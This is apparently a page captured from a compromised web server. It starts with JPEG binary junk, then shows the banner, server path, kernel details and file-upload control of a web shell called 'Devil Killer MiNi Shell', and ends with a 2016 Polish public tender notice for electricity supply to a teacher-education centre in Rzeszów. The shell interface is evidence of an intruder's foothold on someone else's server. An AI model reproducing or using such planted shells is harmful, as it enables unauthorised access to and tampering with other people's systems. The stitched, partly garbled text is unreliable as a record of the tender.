JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161013/323286-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='https://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-30-tys.html' target='_blank'>https://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-30-tys.html</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 323286 - 2016
              z dnia 2016-10-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rzeszów: Dostawa energii elektrycznej na potrzeby Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie w 2017 roku.

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, krajowy numer identyfikacyjny
              69070548200000, ul.
              ul. Niedzielskiego 
              2,
              35036  
              Rzeszów, woj.
              podkarpackie, państwo
              Polska, tel.
              178 534 097, e-mail
              , faks
              178 534 682.
              <br />
              Adres strony internetowej (URL): www.pcen.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />https://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-30-tys.html</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta musi być sporządzona z zachowaniem formy pisemnej pod rygorem nieważności.<br />
                Adres:
                <br />Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, sekretariat pok. nr 1. </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa energii elektrycznej na potrzeby Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie w 2017 roku.

<br /><b>Numer referencyjny: </b>AG-3211/2/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  
                    maksymalnej liczby części 2<br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia został podzielony na dwie części:

Część I: 

Obejmuje dostawę energii elektrycznej w 2017 r. zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (t. j. Dz. U. z 2012 r. poz. 1059 z późn. zm.) oraz z obowiązującymi standardami jakościowymi obsługi odbiorców określonymi w ww. ustawie i aktach wykonawczych do:

1.	Budynku bazy dydaktyczno-noclegowej Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie Oddziału w Przemyślu, ul. Kraszewskiego 7a, 37-700 Przemyśl 
a)	Grupa przyłączeniowa: V 
b)	Moc umowna wynosi 25 kW, przy współczynniku tgf=0,4 
c)	Licznik nr 95836356 
d)	PPE PLZKED10001645075 
e)	Moc przyłączeniowa Pp=40 kW 
f)	Grupa taryfowa C11 
g)	Miejsce dostarczania energii elektrycznej stanowią zaciski wejściowe zabezpieczeń głównych 
h)	Miejsce usytuowania układu pomiarowo-rozliczeniowego: wewnątrz budynku 
i)	Szacunkowe zapotrzebowanie na energię elektryczną w przewidzianym okresie obowiązywania umowy wynosi 22 300 kWh. 

2.	Budynku garażu Ośrodka Edukacji Nauczycieli i Pracowników Administracji Samorządowej w Czudcu, ul. Rzeszowska 82, 38-120 Czudec
a)	Grupa przyłączeniowa: V 
b)	Moc umowna wynosi 4 kW, przy współczynniku tgf =0,4 
c)	Licznik nr 20268430 
d)	PPE 480548101007248847 
e)	Moc przyłączeniowa Pp=16 kW 
f)	Grupa taryfowa C11 
g)	Miejsce dostarczania energii elektrycznej: zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu w kierunku instalacji odbiorcy 
h)	Miejsce usytuowania układu pomiarowo-rozliczeniowego: wewnątrz budynku garażu
i)	Szacunkowe zapotrzebowanie na energię elektryczną w przewidzianym okresie obowiązywania umowy wynosi 20 kWh. 
3.	Zamawiający posiada tytuł prawny do obiektów objętych niniejszym zamówieniem.
4.	Zamawiający informuje, że obecnie obowiązujące umowy dotyczące dostawy energii elektrycznej do ww. punktów poboru zawarte są z PGE OBRÓT S.A., ul. 8 Marca 6, 35-959 Rzeszów. Umowy są zawarte na czas określony 
i obowiązują do 31 grudnia 2016 r., nie wymagają wypowiedzenia.
5.	Zmiana sprzedawcy nastąpi po raz kolejny. Zamawiający nie ma zawartych umów/aneksów w ramach akcji promocyjnych/programów lojalnościowych, które uniemożliwiałyby zawarcie nowych umów sprzedażowych w terminie przewidzianym w niniejszym postępowaniu.
6.	Zamawiający posiada odrębne umowy na świadczenie usług dystrybucji energii elektrycznej do ww. punktów poboru zawarte na czas nieokreślony z PGE Dystrybucja S.A. Zamawiający jest rozliczany za świadczoną usługę dystrybucji energii elektrycznej w dwumiesięcznych okresach rozliczeniowych.
7.	Zamawiający zobowiązuje Wykonawcę do zgłoszenia Operatorowi Systemu Dystrybucyjnego (OSD), na obszarze którego znajdują się punkty odbioru energii elektrycznej (PGE Dystrybucja S.A.) - zakresu zawartej z Zamawiającym umowy dostawy energii elektrycznej, składania oświadczeń woli w zakresie niezbędnym do przeprowadzenia procesu zmiany dostawcy u OSD. 
W powyższym zakresie Zamawiający udzieli wybranemu Wykonawcy stosownego pełnomocnictwa i przekaże mu wszystkie niezbędne dane (również w wersji elektronicznej) do przeprowadzenia procedury zmiany dostawcy.
8.	Podane prognozowane zużycia energii elektrycznej w okresie obowiązywania umowy są ilościami szacunkowymi służącymi do skalkulowania ceny oferty, oraz wyboru najkorzystniejszej oferty. Nie stanowią one dla Zamawiającego zobowiązania do zakupu energii elektrycznej w podanej ilości. Rzeczywiste zużycie wynikać będzie z bieżącego zapotrzebowania Zamawiającego. Wykonawcy, z którym Zamawiający podpisze umowę nie przysługuje żadne roszczenie o realizację dostaw energii elektrycznej w ilościach wpisanych w formularzu ofertowym. 
9.	Zamawiający zawrze jedną umowę na dostawę energii elektrycznej dotyczącej obu wskazanych wyżej lokalizacji. Faktury VAT za dostarczoną energię Wykonawca będzie wystawiał na podstawie odczytów liczników poboru energii elektrycznej otrzymanych od OSD i cen jednostkowych netto podanych 
w ofercie Wykonawcy. Faktury VAT muszą zawierać odrębnie dla każdego miejsca poboru energii elektrycznej: ilość dostarczonej energii elektrycznej oraz cenę jednostkową netto a także wskazanie okresu rozliczeniowego, którego faktura dotyczy. Powyższe dane mogą być także zawarte w załączniku do faktury VAT.
10.	Rozliczenia za dostarczoną energię odbywać się będą w dwumiesięcznych okresach rozliczeniowych. 
11.	Zamawiający zobowiązuje się regulować należności za dostarczoną energię elektryczną (za okres rozliczeniowy) w terminie 21 dni od daty prawidłowo wystawionej faktury VAT przez Wykonawcę - przelewem, na rachunek bankowy w niej wskazany. Wykonawca zobowiązany jest dostarczyć Zamawiającemu fakturę w ciągu 14 dni od daty jej wystawienia. W przypadku nie dostarczenia do Zamawiającego faktury w terminie 14 dni od daty jej wystawienia, termin płatności wynosić będzie 7 dni od daty otrzymania faktury przez Zamawiającego. Zamawiający nie dopuszcza możliwości wystawiania faktur szacunkowych.
12.	Zamawiający dopuszcza możliwość podpisania umowy drogą korespondencyjną.
13.	Wykonawca zapewnia, że posiada wszelkie niezbędne środki do wykonania przedmiotu umowy w sposób gwarantujący jej wykonanie z należytą starannością, w tym  posiada zawartą stosowną obowiązującą umowę z lokalnym operatorem systemu dystrybucyjnego (OSD), na podstawie której można prowadzić sprzedaż energii elektrycznej do obiektów Zamawiającego objętych przedmiotem zamówienia za pośrednictwem sieci dystrybucyjnej OSD.

Część II: 

Obejmuje dostawę energii elektrycznej i usługi jej dystrybucji (umowa kompleksowa dostawy energii elektrycznej) zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne  (Dz. U. z 2012 r. poz. 1059 z późn. zm.) oraz zgodnie z obowiązującymi standardami  jakościowymi obsługi odbiorców określonymi w ww. ustawie oraz aktach wykonawczych do:
Ośrodka Edukacji Nauczycieli i Pracowników Administracji Samorządowej w Czudcu ul. Rzeszowska 82, 38-120 Czudec.

a) Grupa przyłączeniowa: III 
b) Moc umowna wynosi 55 kW, przy współczynniku tgf =0,4 
c) Licznik nr  10891027     
d) PPE 480548201000007732 
e) Moc przyłączeniowa Pp=25 kW 
f) Grupa taryfowa B22 
g) Miejsce dostarczania energii elektrycznej: zaciski prądowe na głowicy kablowej w polu nr 4 SN stacji transformatorowej Czudec Szkoła zasilanej linią 15 kV Boguchwała Strzyżów. Linia kablowa SN, stacja transformatorowa INSTAL oraz pozostałe urządzenia nN są zlokalizowane na nieruchomości zamawiającego.
h) Miejsce usytuowania układu pomiarowo-rozliczeniowego: rozdzielnia pomiarowa SN i nN w stacji transformatorowej INSTAL w Czudcu. 
i) Szacunkowe zapotrzebowanie na energię elektryczną w przewidzianym okresie obowiązywania umowy wynosi 103 300 kWh. 
1.	Zamawiający posiada tytuł prawny do obiektu objętego niniejszym zamówieniem.
2.	Zamawiający informuje, że obecnie obowiązująca umowa ulegnie rozwiązaniu 
z dniem 31 grudnia 2016 r., nie wymaga wypowiedzenia. Zamawiający nie ma zawartych umów/aneksów w ramach akcji promocyjnych/programów lojalnościowych, które uniemożliwiałyby zawarcie nowej umowy w terminie przewidzianym w niniejszym postępowaniu.
3.	Podane prognozowane zużycia energii elektrycznej w okresie obowiązywania umowy są ilościami szacunkowymi służącymi do skalkulowania ceny oferty,  oraz wyboru najkorzystniejszej oferty. Nie stanowią one dla Zamawiającego zobowiązania do zakupu energii elektrycznej w podanej ilości. Rzeczywiste zużycie wynikać będzie z bieżącego zapotrzebowania Zamawiającego. Wykonawcy, z którym Zamawiający podpisze umowę nie przysługuje żadne roszczenie o realizację dostaw energii elektrycznej w ilościach wpisanych w formularzu ofertowym. 
4.	Zamawiający zawrze umowę na kompleksową dostawę energii elektrycznej obejmującą dostawę energii elektrycznej oraz usługi jej dystrybucji. Faktury VAT za dostarczoną energię i usługi  dystrybucji Wykonawca będzie wystawiał na podstawie odczytów liczników poboru energii elektrycznej otrzymanych od OSD i cen jednostkowych netto podanych w ofercie Wykonawcy. W treści faktury lub załącznika do niej Wykonawca wyspecyfikuje koszty energii elektrycznej, koszty dystrybucji i koszty opłat handlowych/ abonamentowych.
5.	Rozliczenia za dostarczoną energię i usługi dystrybucji odbywać się będą w dwumiesięcznych okresach rozliczeniowych. 
6.	Zamawiający zobowiązuje się regulować należności za dostarczoną energię elektryczną i usługi dystrybucji (za okres rozliczeniowy) w terminie 21 dni od daty prawidłowo wystawionej faktury VAT przez Wykonawcę - przelewem, na rachunek bankowy w niej wskazany. Wykonawca zobowiązany jest dostarczyć Zamawiającemu fakturę w ciągu 14 dni od daty jej wystawienia. W przypadku nie dostarczenia do Zamawiającego faktury w terminie 14 dni od daty jej wystawienia, termin płatności wynosić będzie 7 dni od daty otrzymania faktury przez Zamawiającego. Zamawiający nie dopuszcza możliwości wystawiania faktur szacunkowych.
7.	Zamawiający dopuszcza możliwość podpisania umowy drogą korespondencyjną.
8.	Wykonawca zapewnia, że posiada wszelkie niezbędne środki do wykonania przedmiotu umowy w sposób gwarantujący jej wykonanie z należytą starannością, w tym  posiada zawartą stosowną obowiązującą umowę z lokalnym operatorem systemu dystrybucyjnego (OSD) o świadczenie usług dystrybucji energii elektrycznej dla usługi kompleksowej do obiektu Zamawiającego objętego przedmiotem zamówienia.

<br /><br /><b>II.5) Główny kod CPV: </b>09300000-2<br /><b> Dodatkowe kody CPV:</b>65310000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający wymaga złożenia przez Wykonawcę Oświadczenia o spełnieniu warunków udziału w postępowaniu wg załącznika nr 2 do SIWZ. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający wymaga złożenia przez Wykonawcę Oświadczenia o spełnieniu warunków udziału w postępowaniu wg załącznika nr 2 do SIWZ. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający wymaga złożenia Oświadczenia o spełnieniu warunków udziału w postępowaniu wg załącznika nr 2 do SIWZ. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24. ust. 5 pkt. 1 ustawy. 
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt III.4.1 ogłoszenia składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania potwierdzając, że nie otwarto w stosunku do niego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt III.4.2 ogłoszenia zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Wymagania  z pkt III.4.2. ogłoszenia co do terminu wystawienia dokumentów stosuje się odpowiednio. 
4.Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji o złożonych ofertach, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art.24. ust. 1 pkt 23  ustawy wg załącznika nr 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
  
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Aktualna koncesja, wydana przez Prezesa Urzędu Regulacji Energetyki 
w zakresie obrotu energią elektryczną, zgodnie z art. 32 ustawy z dnia 10 kwietnia  1997 r.  prawo energetyczne (tj. Dz. U. z 2012, poz. 1059 z późn. zm.).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
